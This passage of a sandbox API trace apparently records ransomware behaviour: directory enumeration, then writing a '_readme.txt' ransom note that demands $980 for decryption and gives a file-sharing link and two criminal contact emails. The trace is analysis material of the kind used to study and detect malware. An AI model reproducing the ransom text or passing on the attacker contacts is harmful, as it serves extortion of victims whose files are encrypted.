lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0227.387] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x6a3b30 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9e0 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8c8 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed878 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edad0 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7b30 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7b58 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7b80 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7ba8 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7bd0 [0227.388] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.388] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.388] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.388] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.388] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0227.389] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x325d3b8 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda80 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8a0 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7bf8 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7c20 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7c48 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7c70 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7c98 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7cc0 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7ce8 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7d10 [0227.389] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.389] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.389] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.389] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda08 [0227.390] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edad0 [0227.390] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed878 [0227.390] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x310) returned 0x325d5d8 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed8c8 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9e0 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7bd0 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7ba8 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7b80 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7b58 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7b30 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7d38 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7d60 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7d88 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7db0 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7dd8 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7e00 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7e28 [0227.390] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7e50 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7e78 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7ea0 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7ec8 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31f7ef0 [0227.391] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edad0 [0227.391] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda08 [0227.391] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7d8 [0227.391] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.391] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed7b0 [0227.391] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0227.391] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.392] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.392] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0227.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed648 [0227.392] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.392] PathFindFileNameW (pszPath="") returned="" [0227.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.392] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.392] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.392] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.393] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0227.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31edaa8 [0227.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed828 | out: hHeap=0x630000) returned 1 [0227.393] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edaa8 | out: hHeap=0x630000) returned 1 [0227.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x37a3390 [0227.393] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0227.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.393] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.393] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 0 [0227.393] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.393] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.393] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.394] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.394] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.394] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.394] HeapFree (in: hHeap=0x630000, 